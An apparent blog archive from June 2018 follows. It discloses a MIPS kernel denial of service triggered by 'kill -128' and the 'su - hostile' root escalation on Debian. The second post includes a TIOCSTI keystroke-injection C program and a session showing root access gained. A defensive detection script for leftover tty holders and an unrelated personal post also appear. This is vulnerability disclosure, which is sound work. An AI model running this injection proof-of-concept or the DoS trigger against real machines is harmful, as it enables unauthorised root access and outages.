June 2018 Archives
Sat Jun 30 09:19:47 EEST 2018
BUG_ON() on mips kernels 4.17.2 and earlier (old but alive)
This is old but alive. On MIPS kernels 4.17.2 and earlier, an unprivileged user can trigger BUG_ON(), possibly causing denial of service on the whole machine.

Suggested patches from 2013 are in the thread at: https://www.spinics.net/lists/mips/msg73398.html

In 4.17.2, ./kernel/exit.c:

    do_group_exit(int exit_code)
    {
        struct signal_struct *sig = current->signal;

        BUG_ON(exit_code & 0x80);

do_group_exit() is called from ./kernel/signal.c:2482:

    do_group_exit(ksig->info.si_signo);

It appears to me that si_signo can be 0x80 (128 in decimal) because of:

    arch/mips/include/uapi/asm/signal.h:15:#define _NSIG 128

Probably the testcase will be:

    $ kill -128 `pidof program`
Wed Jun 13 12:25:34 EEST 2018
Ancient "su - hostile" vulnerability in debian 8 and 9
Just FYI. Warning: This is rather old, since at least 2005, probably much earlier. Check the links at: http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: Doing "su - hostile" in Debian 8 and 9 may lead to root privilege escalation. Default sudo -u probably is affected too. Per chat with some admins they use su - user.

Session:

    root@machine1:~# su - guest4
    guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
    [1] 4737
    guest4@machine1:~$ exit
    logout
    ### just wait
    root@machine1:~# id
    uid=0(root) gid=0(root) groups=0(root)
    root@machine1:~# cat /tmp/tty.c
    /*
     *
     * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
     *
     */
    #include <sys/ioctl.h>
    #include <termios.h>
    #include <stdio.h>
    #include <stdlib.h>

    void stackchar(char c)
    {
        if (ioctl(0, TIOCSTI, &c) < 0) {
            perror("ioctl");
            exit(1);
        }
    }

    int main(int argc, char *argv[])
    {
        int i, j;
        char c;

        for (i = 1; i < argc; i++) {
            for (j = 0; (c = argv[i][j]); j++) {
                stackchar(c);
            }
            stackchar('\n');
        }
        exit(0);
    }
Tue Jun 12 12:51:05 EEST 2018
Are `su user' and/or `sudo -u user sh' considered dangerous?
Per vague memory I discussed half of this with some Linux crowd and they said "won't fix" long ago.

`su user' and `sudo -u user sh' give the user the fd of root's tty and it is readable and writable. After closing the session, the user can keep it and on root's tty potentially do:

1. inject keypresses via ioctl() and/or
2. read the output of root's tty, probably with some analogue of tee(1).

Is this really a concern? Any workarounds?
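A defender-side check for the condition this post describes, and which the "su - hostile" post above depends on: a process of another user still holding root's tty open. This is an added example, not part of the original posts; the function names, UID 1004, the /dev/pts paths and the optional PROCROOT argument (used only to run against a constructed sample tree) are assumptions.

```shell
#!/bin/sh
# Added example (not from the original posts): list processes that hold an
# open fd on a tty while running under a different real UID than its owner.

# foreign_tty_holders TTY OWNER_UID [PROCROOT]
foreign_tty_holders() {
    tty_path=$1
    owner_uid=$2
    procroot=${3:-/proc}
    for piddir in "$procroot"/[0-9]*; do
        [ -r "$piddir/status" ] || continue
        # Real UID is the first number on the "Uid:" line of /proc/PID/status.
        uid=$(awk '/^Uid:/ {print $2; exit}' "$piddir/status" 2>/dev/null)
        [ -n "$uid" ] || continue
        [ "$uid" = "$owner_uid" ] && continue
        for fd in "$piddir"/fd/*; do
            [ -L "$fd" ] || continue
            if [ "$(readlink "$fd" 2>/dev/null)" = "$tty_path" ]; then
                echo "${piddir##*/} uid=$uid fd=${fd##*/}"
                break
            fi
        done
    done
    return 0
}

# Constructed sample data: a fake /proc tree (PIDs, UID 1004 and ttys are
# made up for the demo; 4737 mirrors the background job in the session).
mk_proc() {  # mk_proc ROOT PID UID TTY
    mkdir -p "$1/$2/fd"
    printf 'Name:\tsample\nUid:\t%s\t%s\t%s\t%s\n' "$3" "$3" "$3" "$3" \
        > "$1/$2/status"
    ln -s "$4" "$1/$2/fd/0"
}
build_sample_proc() {
    mk_proc "$1" 100  0    /dev/pts/3   # root's own shell
    mk_proc "$1" 200  1004 /dev/pts/7   # unrelated user session
    mk_proc "$1" 4737 1004 /dev/pts/3   # leftover job on root's tty
}

# Demo on the sample tree; on a live system run as root:
#   foreign_tty_holders "$(tty)" 0
demo=$(mktemp -d)
build_sample_proc "$demo"
foreign_tty_holders /dev/pts/3 0 "$demo"
rm -rf "$demo"
```

A hit reported after the su session has ended is the leftover-fd situation the post asks about.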
Wed Jun 6 16:20:52 EEST 2018
Near death experience
Long ago I lost consciousness. According to the doctors' logs, I was very close to death. To my surprise, I have memories of this time: flying in a tunnel with very strange lights, and everything was super calm. I never saw such lights, even in computer games. The closest thing to one of the lights is the light of an eye examination, with a light source and pupils widened.

Wikipedia has a page "Near death experience". Looks like establishment science has some interest in this stuff, lol.